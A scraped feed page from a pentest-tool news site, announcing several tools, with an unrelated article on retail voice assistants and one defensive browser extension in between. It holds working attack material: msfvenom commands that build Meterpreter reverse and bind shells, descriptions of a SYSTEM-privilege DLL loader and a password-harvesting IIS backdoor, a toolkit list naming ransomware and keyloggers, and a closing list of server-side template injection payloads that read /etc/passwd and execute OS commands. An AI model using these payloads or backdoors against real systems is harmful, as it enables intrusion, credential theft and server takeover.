Quantcast
Channel: KitPloit - PenTest Tools!
Viewing all 5816 articles
Browse latest View live

MSFPC - MSFvenom Payload Creator

June 30, 2020, 5:30 am
$
0
0

A quick way to generate various "basic" Meterpreter payloads via msfvenom (part of the Metasploit framework).

About
MSFvenom Payload Creator (MSFPC) is a wrapper to generate multiple types of payloads, based on users choice. The idea is to be as simple as possible (only requiring one input) to produce their payload.
Fully automating msfvenom & Metasploit is the end goal (well as to be be able to automate MSFPC itself). The rest is to make the user's life as easy as possible (e.g. IP selection menu, msfconsole resource file/commands, batch payload production and able to enter any argument in any order(in various formats/patterns)).
The only necessary input from the user should be defining the payload they want by either the platform (e.g. windows), or the file extension they wish the payload to have (e.g. exe).
  • Can't remember your IP for a interface? Don't sweat it, just use the interface name: eth0.
  • Don't know what your external IP is? MSFPC will discover it: wan.
  • Want to generate one of each payload? No issue! Try: loop.
  • Want to mass create payloads? Everything? Or to filter your select? ..Either way, its not a problem. Try: batch (for everything), batch msf (for every Meterpreter option), batch staged (for every staged payload), or batch cmd stageless (for every stageless command prompt)!
Note: This will NOT try to bypass any anti-virus solutions at any stage.


Install
  • Designed for Kali Linux v2.x/Rolling& Metasploit v4.11+.
  • Kali v1.x should work.
  • OSX 10.11+ should work.
  • Weakerth4n 6+ should work.
  • ...nothing else has been tested.
$ curl -k -L "https://raw.githubusercontent.com/g0tmi1k/mpc/master/msfpc.sh" > /usr/local/bin/msfpc
$ chmod 0755 /usr/local/bin/msfpc

Kali-Linux
MSFPC is already packaged in Kali Rolling, so all you have to-do is:
root@kali:~# apt install -y msfpc

Help

$ bash msfpc.sh -h -v
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 msfpc.sh <TYPE> (<DOMAIN/IP>) (<PORT>) (<CMD/MSF>) (<BIND/REVERSE>) (<STAGED/STAGELESS>) (<TCP/HTTP/HTTPS/FIND_PORT>) (<BATCH/LOOP>) (<VERBOSE>)
   Example: msfpc.sh windows 192.168.1.10        # Windows & manual IP.
            msfpc.sh elf bind eth0 4444          # Linux, eth0's IP & manual port.
            msfpc.sh stageless cmd py https      # Python, stageless command prompt.
            msfpc.sh verbose loop eth1           # A payload for every type, using eth1's IP.
            msfpc.sh msf batch wan               # All possible Meterpreter payloads, using WAN IP.
            msfpc.sh help verbose                # Help screen, with even more information.

<TYPE>:
   + APK
   + ASP
   + ASPX
   + Bash [.sh]
   + Java [.jsp]
   + Linux [.elf]
   + OSX [.macho]<   br/>   + Perl [.pl]
   + PHP
   + Powershell [.ps1]
   + Python [.py]
   + Tomcat [.war]
   + Windows [.exe // .dll]

 Rather than putting <DOMAIN/IP>, you can do a interface and MSFPC will detect that IP address.
 Missing <DOMAIN/IP> will default to the IP menu.

 Missing <PORT> will default to 443.

<CMD> is a standard/native command prompt/terminal to interactive with.
<MSF> is a custom cross platform shell, gaining the full power of Metasploit.
 Missing <CMD/MSF> will default to <MSF> where possible.
   Note: Metasploit doesn't (yet!) support <CMD/MSF> for every <TYPE> format.
<CMD> payloads are generally smaller than <MSF> and easier to bypass EMET. Limit Metasploit post modules/scripts support.
<MSF> payloads are generally much l   arger than <CMD>, as it comes with more features.

<BIND> opens a port on the target side, and the attacker connects to them. Commonly blocked with ingress firewalls rules on the target.
<REVERSE> makes the target connect back to the attacker. The attacker needs an open port. Blocked with engress firewalls rules on the target.
 Missing <BIND/REVERSE> will default to <REVERSE>.
<BIND> allows for the attacker to connect whenever they wish. <REVERSE> needs to the target to be repeatedly connecting back to permanent maintain access.

<STAGED> splits the payload into parts, making it smaller but dependent on Metasploit.
<STAGELESS> is the complete standalone payload. More 'stable' than <STAGED>.
 Missing <STAGED/STAGELESS> will default to <STAGED> where possible.
   Note: Metasploit doesn't (yet!) support <STAGED/STAGELESS> for every <TYPE> format.
<STA   GED> are 'better' in low-bandwidth/high-latency environments.
<STAGELESS> are seen as 'stealthier' when bypassing Anti-Virus protections. <STAGED> may work 'better' with IDS/IPS.
 More information: https://community.rapid7.com/community/metasploit/blog/2015/03/25/stageless-meterpreter-payloads
                   https://www.offensive-security.com/metasploit-unleashed/payload-types/
                   https://www.offensive-security.com/metasploit-unleashed/payloads/

<TCP> is the standard method to connecting back. This is the most compatible with TYPES as its RAW. Can be easily detected on IDSs.
<HTTP> makes the communication appear to be HTTP traffic (unencrypted). Helpful for packet inspection, which limit port access on protocol - e.g. TCP 80.
<HTTPS> makes the communication appear to be (encrypted) HTTP traffic using as SSL. Helpful for packet inspection, which limit port access on protocol - e.g. TCP 443.
<FIND_PORT> will attempt every port on the target machine, to find a way out. Useful with stick ingress/engress firewall rules. Will switch to 'allports' based on <TYPE>.
 Missing <TCP/HTTP/HTTPS/FIND_PORT> will default to <TCP>.
 By altering the traffic, such as <HTTP> and even more <HTTPS>, it will slow down the communication & increase the payload size.
 More information: https://community.rapid7.com/community/metasploit/blog/2011/06/29/meterpreter-httphttps-communication

<BATCH> will generate as many combinations as possible: <TYPE>, <CMD + MSF>, <BIND + REVERSE>, <STAGED + STAGLESS> & <TCP + HTTP + HTTPS + FIND_PORT>
<LOOP> will just create one of each <TYPE>.

<VERBOSE> will display more information.
$

Example #1 (Windows, Fully Automated Using Manual IP)
$ bash msfpc.sh windows 192.168.1.10
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: 192.168.1.10
 [i] PORT: 443
 [i] TYPE: windows (windows/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p windows/meterpreter/reverse_tcp -f exe \
  --platform windows -a x86 -e generic/none LHOST=192.168.1.10 LPORT=443 \
> '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] windows meterpreter created: '/root/windows-meterpreter-staged-reverse-tcp-443.exe'

 [i] MSF handler file: '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [i] Run: msfconsole -q -r '/root/windows-meterpreter-staged-reverse-tcp-443-exe.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Example #2 (Linux Format, Fully Automated Using Manual Interface and Port)
$ ./msfpc.sh elf bind eth0 4444 verbose
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]        IP: 192.168.103.142
 [i]      PORT: 4444
 [i]      TYPE: linux (linux/x86/shell/bind_tcp)
 [i]     SHELL: shell
 [i] DIRECTION: bind
 [i]     STAGE: staged
 [i]    METHOD: tcp
 [i]       CMD: msfvenom -p linux/x86/shell/bind_tcp -f elf \
  --platform linux -a x86 -e generic/none  LPORT=4444 \
> '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] linux shell created: '/root/linux-shell-staged-bind-tcp-4444.elf'

 [i] File: ELF 32-bit LSB executable, Intel 80386, version 1 (SYSV), statically linked, corrupted section header size
 [i] Size: 4.0K
 [i]  MD5: eed4623b765eea623f2e0206b63aad61
 [i] SHA1: 0b5dabd945ef81ec9283768054b3c22125aa9185

 [i] MSF handler file: '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
 [i] Run: msfconsole -q -r '/root/linux-shell-staged-bind-tcp-4444-elf.rc'
    [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$

Example #3 (Python Format, Interactive IP Menu)
$ msfpc stageless cmd py tcp
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

 [i] Use which interface - IP address?:
 [i]   1.) eth0 - 192.168.103.142
 [i]   2.) lo - 127.0.0.1
 [i]   3.) wan - 31.204.154.174
 [?] Select 1-3, interface or IP address: 1

 [i]   IP: 192.168.103.142
 [i] PORT: 443
 [i] TYPE: python (python/shell_reverse_tcp)
 [i]  CMD: msfvenom -p python/shell_reverse_tcp -f raw \
  --platform python -e generic/none -a python LHOST=192.168.103.142 LPORT=443 \
> '/root/python-shell-stageless-reverse-tcp-443.py'

 [i] python shell created: '/root/python-shell-stageless-reverse-tcp-443.py'

 [i] MSF handler file: '/root/python-shell-stageless-reverse-tcp-443-py.rc'
 [i] Run: msfconsole -q -r '/root/python-shell-stageless-reverse-tcp-443-py.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!
$
Note: Removed WAN IP.

Example #4 (Loop - Generates one of everything)
$ ./msfpc.sh loop wan
 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i] Loop Mode. Creating one of each TYPE, with default values

 [*] MSFvenom Payload Creator (MSFPC v1.4.4)
 [i]   IP: xxx.xxx.xxx.xxx
 [i] PORT: 443
 [i] TYPE: android (android/meterpreter/reverse_tcp)
 [i]  CMD: msfvenom -p android/meterpreter/reverse_tcp \
  LHOST=xxx.xxx.xxx.xxx LPORT=443 \
> '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

 [i] android meterpreter created: '/root/android-meterpreter-stageless-reverse-tcp-443.apk'

 [i] MSF handler file: '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
 [i] Run: msfconsole -q -r '/root/android-meterpreter-stageless-reverse-tcp-443-apk.rc'
 [?] Quick web server (for file transfer)?: python2 -m SimpleHTTPServer 8080
 [*] Done!


 [*] MSFvenom Payload Creator (MSFPC v1.4.4)

...SNIP...

 [*] Done!

$
Note: Removed WAN IP.


To-Do List
  • Shellcode generation
  • x64 payloads
  • IPv6 support
  • Look into using OS scripting more (powershell_bind_tcp& bind_perl etc)


Search

Basecrack - Best Decoder Tool For Base Encoding Schemes

June 30, 2020, 2:30 pm
$
0
0

BaseCrack is a tool written in Python that can decode all alphanumeric base encoding schemes. This tool can accept single user input, multiple inputs from a file, input from argument, multi-encoded bases and decode them incredibly fast.
Decode Base16, Base32, Base36, Base58, Base62, Base64, Base64Url, Base85, Base91, Base92 and more with the best base encoding scheme decoding tool in town. It's useful for CTFs, Bug Bounty Hunting, and Cryptography.
What's new in v1.1: I heard your feature requests, now you can generate a wordlist/output with the decoded bases! :)

What's new in v2.0:
Now BaseCrack supports both Python2 and Python3

Magic Mode
Now you can decode multi-encoded bases of any pattern in a single shot.
Have you ever stumbled upon that one lame CTF challenge that gives you an encoded string which is just encoded over and over with Base64, Base91, Base85 and so on? Just give that to BaseCrack and you're done with it! ;)


Want to test it out? Just give it this input:
IX(Fp@nNG6ef<,*TFE]IT^zdINAb9EVbp,e<u=O6nN)/u+MTnU;Fo#VvQ&cK;mLZI#Jbdook<O{W#+gY%ooe#6pTkTa.9YPU8Uc=pl9BhSM9%kISw2k:8..u/6F2BwNndPZ2o#7NHNP3g,HlZu><*[Nv+T8
and see for yourself! :)
API: BaseCrack can now be used as a library! Just import the BaseCrack() class and call the decode() function. See example below.

Supported Encoding Schemes
  • Base16
  • Base32
  • Base36
  • Base58
  • Base62
  • Base64
  • Base64Url
  • Base85
  • Base91
  • Base92

Main Features
  • Can decode multi-encoded bases of any pattern.
  • Can decode multiple base encodings from a file.
  • Generate a wordlist/output with the decoded bases.
  • Predicts the type of encoding scheme.

Screenshots


Installation
$ git clone https://github.com/mufeedvh/basecrack.git
$ cd basecrack
$ pip install -r requirements.txt
$ python basecrack.py -h

Usage
To decode a single base encoding from user input:
python basecrack.py
To decode a single base encoding from argument (-b/--base):
python basecrack.py -b SGVsbG8gV29ybGQh
To decode multiple base encodings from a file (-f/--file):
python basecrack.py -f file.txt
Magic Mode: To decode multi-encoded base of any pattern (-m/--magic):
python basecrack.py --magic
To generate a wordlist/output with the decoded bases (-o/--output):
python basecrack.py -f file.txt -o output-wordlist.txt

API
Want to use BaseCrack as a library? We got you covered!
Just put basecrack in your project's folder and you're ready to go!
Example:
# import the BaseCrack class from basecrack.py
from basecrack import BaseCrack

# calling the api function decode() with the encoded base
result = BaseCrack().decode('c3BhZ2hldHRp')

# printing the output
"""
result is tuple where:
result[0] = DECODED STRING
result[1] = ENCODING SCHEME
"""
print('Decoded String: {}'.format(result[0]))
print('Encoding Scheme: {}'.format(result[1]))
Output:
Decoded String: spaghetti
Encoding Scheme: Base64
Time to integrate this into your automation tools! ;)


UsoDllLoader - Windows - Weaponizing Privileged File Writes With The Update Session Orchestrator Service

July 1, 2020, 5:30 am
$
0
0

2020-06-06 Update: this trick no longer works on the latest builds of Windows 10 Insider Preview. This means that, although it still works on the mainstream version of Windows 10, you should expect it to be patched in the coming months.

Description
This PoC shows a technique that can be used to weaponize privileged file write vulnerabilities on Windows. It provides an alternative to the DiagHub DLL loading "exploit" found by James Forshaw (a.k.a. @tiraniddo), which was fixed by Microsoft starting from build version 1903.

TL;DR
Starting from Windows 10, Microsoft introduced the Update Session Orchestrator service. As a regular user, you can interact with this service using COM, and start an "update scan" (i.e. check whether updates are available) or start the download of pending updates for example. There is even an undocumented built-in tool called usoclient.exe, which serves that purpose.
From an attacker's standpoint, this service is interesting because it runs as NT AUTHORITY\System and it tries to load a non-existent DLL (windowscoredeviceinfo.dll) whenever an Update Session is created.
This means that, if we found a privileged file write vulnerability in Windows or in some third-party software, we could copy our own version of windowscoredeviceinfo.dll into C:\Windows\Sytem32\ and then have it loaded by the USO service to get arbitrary code execution as NT AUTHORITY\System.
For more information:
Part 1 - https://itm4n.github.io/usodllloader-part1/
Part 2 - https://itm4n.github.io/usodllloader-part2/

Build the PoC

Content
This solution is composed of two projects: WindowsCoreDeviceInfo and UsoDllLoader.
  • WindowsCoreDeviceInfo
It provides a PoC DLL that will start a bind shell on port 1337 (localhost only), whenever the QueryDeviceInformation() function is called. That's the name of the function used by the USO workers.
  • UsoDllLoader (optional)
It's a stripped-down version of usoclient.exe. It can be run as a regular user to interact with the USO service and have it load windowscoredeviceinfo.dll. Then, it will try to connect to the bind shell. In case of errors, please read the "Known issues" section.

Build the solution
The solution is already preconfigured so compiling should be easy. I'm using Visual Studio 2019. It might not work with older versions.
  1. Select Release config and x64 architecure.
  2. Build solution.
  3. Output: the DLL .\x64\Release\WindowsCoreDeviceInfo.dll and the loader .\x64\Release\UsoDllLoader.exe.

Test

Usage 1 - UsoDllLoader
For testing purposes, you can:
  1. As an administrator, copy WindowsCoreDeviceInfo.dll to C:\Windows\System32\.
  2. Use the loader as a regular user.
  3. Hopefully enjoy a shell as NT AUTHORITY\SYSTEM.

Usage 2 - UsoClient
If UsoDllLoader.exe fails, you can do the above manually.
  1. As an administrator, copy WindowsCoreDeviceInfo.dll to C:\Windows\System32\.
  2. Use the command usoclient StartInteractiveScan as a regular user. Note that you won't get any feedback from the command.
  3. Download netcat for Windows and use the command nc.exe 127.0.0.1 1337 to connect to the bindshell.

Known issues
  • Pending updates
This method will probably fail if one or several updates are waiting to be installed, or if updates are being installed.
  • RPC errors
Depending on the version of Windows, UsoDllLoader.exe might fail with various error codes. I didn't investigate these issues too much. The reason for this is that it's only a PoC, which I developped for convenience. What matters the most is the DLL, not the loader. See "Usage 2" for more details.


IIS-Raid - A Native Backdoor Module For Microsoft IIS (Internet Information Services)

July 1, 2020, 2:30 pm
$
0
0

IS Raid is a native IIS module that abuses the extendibility of IIS to backdoor the web server and carry out custom actions defined by an attacker.

Documentation
When installed, IIS-Raid will process every request and method, check if the X-Password header exists and compare it against the hardcoded value. In case the value specified by the header doesn't match the password, the request will continue normally without giving any indications of the backdoor. If the header value matches the password, it will search for the communication header and extract its content. Additionally, it will base64 decode it, compare it against the predefined commands and process the instructions if any.
Four arguments are implemented on the script:
  • --url : The URL that will be used to communicate with the backdoor. [Required]
  • --password - The pre-shared password on the backdoor [Required]
  • --header - The header to use for communication in case it was changed from the default one.
  • --method - Change the method to either GET or POST.
Some of the features that are currently implemented in this version are:
  • Interactive Command Execution - Allows the execution of commands and retrieve the output.
  • Shellcode Injection - Extend functionality by injecting custom shellcode.
  • Web Password Extractor - Extract passwords from Web Forms in clear-text.

Customisation
Before using and compiling the module, you need to change some of the options. To authenticate to the backdoor, the controller uses a pre-shared password with the module. As this is the only mechanism preventing someone else from accessing the backdoor, the default password must be changed.
Apart from the password, other backdoor options can be modified on the Functions.h file:


The COM_HEADER definition is the header name used to perform the communication between the backdoor and the controller. The PASS_FILE definition is the file path where the extracted credentials from the web forms will be saved. The PASSWORD definition is the password that will be used to authenticate to the backdoor.

More info
For more information refer to https://www.mdsec.co.uk/2020/02/iis-raid-backdooring-iis-using-native-modules/

Demo Video




How AI and Voice Technology is Similar to a Service Dog

July 1, 2020, 8:11 pm
$
0
0

Can a more complex comparison be made? AI and voice assistance are similar to a seeing-eye dog. Throwing the duties of a service dog into the same court as technology is outlandish as things get, even in the middle of an ever-shifting pandemic. But with retail software development services working toward a new shopping experience, those individuals who have impaired seeing capabilities could find some respite.

A Service Dog Helps Navigate Daily Life

Voice technology in retail software can help those who cannot see navigate a store or mall more easily. Interactive applications are available for download. All of these tools aid in the navigation of daily life, much like a service dog would. Although the service dog may not be able to tell you what price is on a tag or what color the shirt is, I’m sure the combination of retail software development services and a service dog is one unstoppable duo. 

Shopping Through Smart Home Devices

Smart home devices make life less stressful and seem easier to manage. Well, for people with vision implications, the smart home device can be an easy way to shop. Internet retailers have adapted AI voice technology to be able to interact with users to add items to carts and easily purchase. Now, of course, our service dog can’t do that! 

Interactive Retail Software Offer Voice Services

What a service dog can do, and the smart home cannot make sure people are crossing the street safely or help them catch the train to the store. But once they’re in the store, new retail software development services can employ interactive mobile applications designed specifically for a mall or shopping establishment.
Voice assistance can help turn-by-turn through the store, right to the item the user is seeking. Though a user with vision difficulties may not be able to read a map, the AI voice assistance can make sure they arrive safely to the next store or restrooms, with the dog’s help too!

Shop Retailers From Website or Parking Lot

Large corporations are the few retailers offering such services, but it’s predicted that more and more companies will start to offer voice-assisted shopping directly from their websites or by a phone call in response to the new shopping style emerging post-pandemic.

A New Retail Experience

Shoppers are hesitant to head into stores after the pandemic took our world and made it it’s own. Retail software development services are adapting rapidly to the new change. Increasingly, AI voice software will help shoppers find in-store products just by calling from the parking lot.
Now, users who use a service dog can “browse” stores without even having to go in! Their dog is there, to help hail a ride or get on the bus, but now voice technology can assist shoppers who cannot see find the exact product in mind.
A service dog and a robot walked into a bar, what do you get? A really cool shopping experience! Retail software and dogs offer tremendous help to those people who are blind, and the future has only been accelerated by the world’s current affairs. Technology that helps more than hurts is always refreshing to see but until we see AI that can translate a dog’s thoughts (so they can shop for us!), we’ll never be satisfied.






KITT-Lite - Python-Based Pentesting CLI Tool

July 2, 2020, 6:00 am
$
0
0

The KITT Penetration Testing Framework was developed as an open source solution for pentesters and programmers alike to compile the tools they use with what they know into an open source project. With KITT, users are able to easily access a list of commonly used tools to their profession which are all open to configuration in the source code.
UPDATE: Now Supporting Kali 2020.2!
If you want to check out the full GUI version of KITT its repo can be found here

Features

OSINT

Cracking

Phishing

Payloads
  • Evil-Droid - Android APK Payloading & Embedding Framework
  • Catchyou - Undetectable Win32 Payload Generator
  • Winspy - Windows Reverse Shell Generator w/ IP Poisoning
  • Evilreg - Windows .reg Reverse Shell Generator
  • Badlnk - Shortcut (.lnk) Reverse Shell Generator
  • Enigma - Multiplatform Payload Dropper
  • Avet_Fabric - Windows AV Evasive Payloads
  • Eviloffice - Injects Macro & DDE Code into Excel & Word Documents
  • Evilpdf - Embeds .exe Files into PDF Files
  • EvilDLL - DLL Reverse Shell Generator
  • DroidTracker - Android .APK Locaton Tracker
  • hmmcookies - Grabs Firefox, Chrome, and Opera Cookies

Keyloggers

Privilege Escalation/Exploitation
  • BIOS_UBTU_Rooter.sh - Custom Ubuntu usb boot exploit
  • LinEnum - Linux shell enumeration tool
  • Linux - Linux Exploits and Enumeration Scripts
  • Mimikatz_trunk - Windows post exploitation tool
  • mysql - MSQL exploits and enumeration scripts
  • passwd_backdoor.sh - Custom passwd/ backdoor exploit for post-exploitation
  • pspy - Process scanner for linux
  • windows-privesc-check - Windows PrivEsc Scripts
  • Windows-Privlege-Escalation - Windows PrivEsc Scripts
  • Chromepass - AV-Undetectable Chrome Login Extraction Tool (Local exec)
  • htbenum - Offline Local Enum Server (Mainly for HTB)
  • PeekABoo - Enables RDP Service (Only on WinRM Machines - Enabled by default on WinServer machines but not client machines)
  • firefox_decrypt - Mozilla Browser Saved Login Extractor
  • Powershell-reverse-tcp - Reverse TCP Powershell Payload w/ Obfuscation
  • Invoker - Post Windows Non-GUI Shell Utility
  • HiveJack - Windows SAM Dump Tool
  • Impacket - Python Network Protocol Tools
  • Win-Brute-Logon - Post Tool For Cracking User Passwords (XP -> 10)
  • Covermyass - Covers Your Tracks on UNIX Systems
  • Leviathan - System Audit Toolkit
  • ispy - EternalBlue/Bluekeep Scanner/Exploiter
  • NekoBotV1 - Auto Exploiter Tool
  • Gtfo - Unix Binary Search Tool
  • Grok-backdoor - Python-Based Backdoor with Ngrok Tunneling
  • Mimikatz - Windows password, hash, PIN, and kerberos ticket extraction tool

Ransomeware
  • Hidden-cry - Windows AES 256 Bit Encrypter/Decrypter
  • CryDroid - Android Encrypter/Decrypter

Bots

Network Cracking
  • Airsuite-ng - Software suite w/ detector, packet sniffer, WEP and WPA/WPA2-PSK Cracker and analysis tool
  • Wash & Reaver - WPS Cracking tools
  • Wifite2 - Network Auditing Tool
  • Ettercap - MiTM Attack Suite
  • Airgeddon - Network Auditing Tool
  • WiFipumpkin3 - Network Cracking Framework
  • Wifijammer - Stationary or Mobile WiFi Jammer
  • PwnSTAR - Fake AP Tool Framework
  • HT-WPS - WPS Pin Extractor
  • Linset - WPA/WPA2 MiTM Attack Tool
  • PentBox - HoneyPot Setup Tool
  • Espionage - Packet Sniffer/ARP Spoofer
  • EvilNet - ARP Attacks, VLAN Attacks, MAC Flooding, etc.

IoT Exploitation
  • HomePwn - IoT Exploitation Framework
  • Spooftooph - BT Spoofing
  • BtVerifier - Rfcomm Channel Verifier
  • BlueScan - BT Port/MAC Scanner

Hardware Hacking
  • MouseJack - BT Keyboard and Mouse Hijacker
  • GPIO_CTL - Custom GPIO Controller for RPi
  • Brutal - RubberDucky Payload Generator

System Security
  • SysIntegrity - File MD5sum Integrity Analyzer
  • snort - Network Intrusion Detection System
  • ssh_port_randomizer - SSHD Port Randomizer
  • ssh rsa_key generator - RSA Key generator
  • proxy router - Traffic Proxy Router
  • ssh_encryption - Buffing SSHD Security Protocols
  • Fail2ban Configurations - Fail2ban Protocol Auditer
  • PTF - PenTesting Tool Installation Framework
  • ClamAV - CLI Virus/Malware Scanner
  • Wotop - Tunnels Internet Traffic Over HTTP
  • TorghostNG - Directs All Internet Traffic Through Tor Proxy

Getting Started
WARNING: KITT was developed and tested on Kali Linux for RPi, I have not added support for any other distro yet but plan to in the near future.
WARNING: Installation Takes About 20 Minutes To Finish!
To begin, run sudo ./setup.sh to install all necessary libraries and configure PATH usage. Simply follow all instructions in the installer.
If you want to only install the tools, run sudo ./catchup.sh

Usage
To begin the framework, type KITTlite and execute in terminal.

Legal Disclaimer
Usage of KITT-Lite and/or the tools installed with KITT-Lite for attacking targets without prior mutual consent is illegal. It's the end user's responsibility to obey all applicable local, state, and federal laws. Developers assume no liability and are not responsible for any misuse or damage caused by this program.

Built With
  • RPi 3B+ - Micro-Computer Developed by the Raspberry Pi Foundation
  • Kali Linux - Pentesting OS Developed by Offensive Security
  • GitHub - This Website!

Authors


ShellGen - Reverse shell generator

July 2, 2020, 3:30 pm
$
0
0

This is a simple script that will generate a specific or all shellcodes for CTFs using the VPN IP address on tun0 (the IPv4).

INFORMATION
Update has been made from sys library to argparse library (done in version 0.8)

Usage
For help:
  • shellgen -h
  • shellgen --help
If you want to skip update and just get the reverse shell, add --no-update to your commands and it will skip it.
To update:
  • ./shellgen.py -u
  • ./shellgen.py --update
List shells available:
  • shellgen --shells
  • shellgen -ls
An example for using:
  • shellgen --lhost 10.10.12.3 --lport 1234 --shell netcat
To request an improvement or new feature:
  • Create an issue and mark as enhancement
For issues:
  • Create an issue and mark as bug


Behave - A Monitoring Browser Extension For Pages Acting As Bad Boys

July 3, 2020, 6:00 am
$
0
0


A (Still in Development) monitoring browser extension for pages acting as bad boys.
NB: This is the code repository of the project, if you're looking for the packed extensions:
Firefox: https://addons.mozilla.org/en-US/firefox/addon/behave/
Chrome: https://chrome.google.com/webstore/detail/mppjbkhgconmemoeagfbgilblohhcica/

Introduction.
Behave! monitors and warn if a web page performs any of following actions:
  • Browser based Port Scan
  • Access to Private IPs
  • DNS Rebinding attacks to Private IPs
Here's Behave! pointing the finger to at.tack.er page in the logs:


Port Scan Monitoring
Behave! will alert the user if the number of port or protocol used during a browser session exceeds a specific limit.
The limit is 20 by default, but it can be changed by the user via preferences.
Since Behave does not perform any DNS request,

Direct access to Private IPs Monitoring
Behave! will alert if a web page tries to directly access to an IP belonging to any the following blocks:
  • Loopback addresses IPv4 127.0.0.1/8
  • Loopback addresses IPv6 ::1/128
  • Private Networks IPv4 10.0.0.0/8 - 172.16.0.0/12 - 192.168.0.0/16
  • Unique Local Addresses IPv6 fc00::/7

DNS Resolution to Private IPs
If a malicious script instructs the Browser to connect to a FQDN whose authoritative DNS resolves to a private IP Behave! checks if the resolved IP is private. Anyway, the IP information of a resolved hostname is available only if the port is open.
Since Behave!, in order to prevent TOCTOU issues, does not perform any external DNS request, if the port is closed there will be no IP resolution available and therefore, no alert.

DNS Rebinding Bypasses
Behave! does not perform any direct DNS request, and the IP is taken from the intercepted response.
That means that it's not exposed to any TOCTOU attack like DNS Rebinding.

DNS Rebinding Monitoring
Behave! keeps track if a hostname is resolved with multiple IPs, and will alert if there's some mixing between public IPs and private ones.

Install
Behave! is available as packed extension on:
Firefox Extension: https://addons.mozilla.org/en-US/firefox/addon/behave/
Chrome Extension: https://chrome.google.com/webstore/detail/mppjbkhgconmemoeagfbgilblohhcica/
However, if like you want to play a bit with the code you can:
  • Clone it OR download the zip and unzip
  • Open Google Chrome/Chromium go to chrome://extension
  • Activate Developer Mode
  • Push "Load Unpacked" and choose the Behave directory.
  • Enjoy Behave!

Wanna Test Behave! ?
See what happens when you go to one of the following:
Singularity of Origin DNS Rebinding Attack: http://rebind.it:8080/manager.html
JavaScript Port Scan: http://jsscan.sourceforge.net/jsscan2.html
Nota Bene: At the moment it won't alert if DNS Rebinding attack is performed on non private IPs such as: http://www.alf.nu/BrowserCacheAndDnsRebinding

Wanna Help?
You are welcome to help! Feel free to create an Issue or fork the project and make a PR.


Search

Server Side Template Injection Payloads

July 3, 2020, 12:44 pm
$
0
0

Server-side template injection is when an attacker is able to use native template syntax to inject a malicious payload into a template, which is then executed server-side.
Template engines are designed to generate web pages by combining fixed templates with volatile data. Server-side template injection attacks can occur when user input is concatenated directly into a template, rather than passed in as data. This allows attackers to inject arbitrary template directives in order to manipulate the template engine, often enabling them to take complete control of the server. As the name suggests, server-side template injection payloads are delivered and evaluated server-side, potentially making them much more dangerous than a typical client-side template injection.

Impact :
Server-side template injection vulnerabilities can expose websites to a variety of attacks depending on the template engine in question and how exactly the application uses it. In certain rare circumstances, these vulnerabilities pose no real security risk. However, most of the time, the impact of server-side template injection can be catastrophic.
At the severe end of the scale, an attacker can potentially achieve remote code execution, taking full control of the backend server and using it to perform other attacks on internal infrastructure.
Even in cases where full remote code execution is not possible, an attacker can often still use server-side template injection as the basis for numerous other attacks, potentially gaining read access to sensitive data and arbitrary files on the server.

Payloads :
{{2*2}}[[3*3]]
{{3*3}}
{{3*'3'}}
<%= 3 * 3 %>
${6*6}
${{3*3}}
@(6+5)
#{3*3}
#{ 3 * 3 }
{{dump(app)}}
{{app.request.server.all|join(',')}}
{{config.items()}}
{{ [].class.base.subclasses() }}
{{''.class.mro()[1].subclasses()}}
{{ ''.__class__.__mro__[2].__subclasses__() }}
{% for key, value in config.iteritems() %}<dt>{{ key|e }}</dt><dd>{{ value|e }}</dd>{% endfor %}
{{'a'.toUpperCase()}} 
{{ request }}
{{self}}
<%= File.open('/etc/passwd').read %>
<#assign ex = "freemarker.template.utility.Execute"?new()>${ ex("id")}
[#assign ex = 'freemarker.template.utility.Execute'?new()]${ ex('id')}
${"freemarker.template.utility.Execute"?new()("id")}
{{app.request.query.filter(0,0,1024,{'options':'system'})}}
{{ ''.__class__.__mro__[2].__subclasses__()[40]('/etc/passwd').read() }}
{{ config.items()[4][1].__class__.__mro__[2].__subclasses__()[40]   ("/etc/passwd").read() }}
{{''.__class__.mro()[1].__subclasses__()[396]('cat flag.txt',shell=True,stdout=-1).communicate()[0].strip()}}
{{config.__class__.__init__.__globals__['os'].popen('ls').read()}}
{% for x in ().__class__.__base__.__subclasses__() %}{% if "warning" in x.__name__ %}{{x()._module.__builtins__['__import__']('os').popen(request.args.input).read()}}{%endif%}{%endfor%}
{$smarty.version}
{php}echo `id`;{/php}
{{['id']|filter('system')}}
{{['cat\x20/etc/passwd']|filter('system')}}
{{['cat$IFS/etc/passwd']|filter('system')}}
{{request|attr([request.args.usc*2,request.args.class,request.args.usc*2]|join)}}
{{request|attr(["_"*2,"class","_"*2]|join)}}
{{request|attr(["__","class","__"]|join)}}
{{request|attr("__class__")}}
{{request.__class__}}
{{request|attr('application')|attr('\x5f\x5fglobals\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fbuiltins\x5f\x5f')|attr('\x5f\x5fgetitem\x5f\x5f')('\x5f\x5fimport\x5f\   x5f')('os')|attr('popen')('id')|attr('read')()}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"new java.lang.String('xxx')\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"whoami\\\"); x.start()\")}}
{{'a'.getClass().forName('javax.script.ScriptEngineManager').newInstance().getEngineByName('JavaScript').eval(\"var x=new java.lang.ProcessBuilder; x.command(\\\"netstat\\\"); org.apache.commons.io.IOUtils.toString(x.start().getInputStream())\")}}
